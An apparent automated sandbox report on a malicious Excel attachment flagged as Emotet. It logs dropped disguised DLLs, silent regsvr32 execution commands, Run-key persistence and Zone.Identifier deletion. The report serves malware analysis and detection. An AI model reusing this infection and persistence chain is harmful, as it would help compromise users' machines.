              Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
              Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
              Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
              Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dllJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv2.ooocccxxxJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dllJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv3.ooocccxxxJump to dropped file
              Source: PO0000001552.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
              Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
              Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
              Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
              Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
              Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\XEzXl\Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B07DBCC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B07C420
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B06EAB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B06732C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B0719D4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B07C0E8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B07D118
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B06EFA4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B07C7C0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B06D720
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B074574
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B065D68
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B0715B0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B073CE8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_009B0000
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180001864
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008470
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800274F4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180012108
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180027AE4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180007F20
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180019F38
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000EB3C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000FBB4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180001FE8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800197F8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180012BFC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001EBFC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008BFC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003800
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180007014
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015020
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002A43C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E850
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180002C5C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180013468
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A470
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180016C70
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180014C80
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000B888
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180011C90
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180021894
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180021094
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180026098
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180005498
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017CB0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180025CB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000CCB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800094BC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800180C8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001B4CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800278D8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003CD8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001E8E4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800258E8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800138F0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180002504
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001C108
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E50C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180014514
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180026518
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015120
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015524
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180007130
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008D40
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002C144
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000795C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180001560
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001C57C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E97C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003990
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800099A0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800299A4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000B9B4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180013DBC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FDC0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800131C8
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D1CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800029CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000B5CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800245D0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180014DD0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800191E0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000FDE4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A9F0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800055F4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180019E08
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000320C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180011A19
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001F624
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003E2C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180013634
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001BA34
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002BA3C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015240
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017A40
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180007658
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C65C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000FA60
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180025668
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006668
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008E68
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001B670
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001BE70
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000A678
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A27C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180025280
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180005684
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000CE88
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180021E8C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002228C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001428C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180018698
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180023E9C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800016A0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800072A4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D6A4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B6AC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800026B0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000CAB4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BAD0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001EEE0
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180025B0C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180021B10
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003310
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E310
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180027F1C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FF28
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180011F30
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180010330
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C334
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015344
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003F54
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006B54
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180029F58
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A764
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180013B6C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001337C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180009B84
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180024788
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001F388
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180019B88
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C788
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001238C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180023B90
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001BB98
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B39C
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000B3A4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180010BAE
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800293B4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800167C4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000AFD4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BBD4
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800137DC
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000ABDC
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
              Source: PO0000001552.xlsVirustotal: Detection: 66%
              Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
              Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: PO0000001552.LNK.0.drLNK file: ..\..\..\..\..\Desktop\PO0000001552.xls
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{8FCFB94A-FCE6-4E34-A02C-69E8EC3E944A} - OProcSessId.datJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@11/15@4/59
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B0638E8 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,ShowWindow,UpdateWindow,
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: PO0000001552.xlsOLE indicator, Workbook stream: true
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800274F4 FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
              Source: PO0000001552.xlsInitial sample: OLE indicators vbamacros = False
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180005098 push ebp; ret
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800118AD push esp; retn 0000h
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800170C8 push eax; retf
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800170DD push ecx; iretd
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000512B push ebp; retf
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180004938 push eax; ret
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800171F0 push eax; retf
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180010F42 push 8B48E1F7h; retf
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800117D6 pushad ; ret
              Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.drStatic PE information: section name: text
              Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.drStatic PE information: section name: text
              Source: elv2.ooocccxxx.0.drStatic PE information: section name: text
              Source: elv3.ooocccxxx.0.drStatic PE information: section name: text
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B072AF0 DecodePointer,_errno,_invalid_parameter_noinfo,LoadLibraryW,GetProcAddress,_errno,GetLastError,_invalid_parameter_noinfo,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,
              Source: elv2.ooocccxxx.0.drStatic PE information: real checksum: 0x6e4a7 should be: 0x7446f
              Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.drStatic PE information: real checksum: 0x6e4a7 should be: 0x7446f
              Source: elv3.ooocccxxx.0.drStatic PE information: real checksum: 0x6e4a7 should be: 0x72327
              Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.drStatic PE information: real checksum: 0x6e4a7 should be: 0x72327
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv2.ooocccxxxJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv3.ooocccxxxJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dllJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv2.ooocccxxxJump to dropped file
              Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)Jump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dllJump to dropped file
              Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)Jump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv3.ooocccxxxJump to dropped file
              Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)Jump to dropped file
              Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)Jump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv2.ooocccxxxJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv3.ooocccxxxJump to dropped file

              Boot Survival

              barindex
              Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv2.ooocccxxxJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\elv3.ooocccxxxJump to dropped file
              Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dllJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\XEzXl\JZazaZgAOY.dll:Zone.Identifier read attributes | delete
              Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll:Zone.Identifier read attributes | delete
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
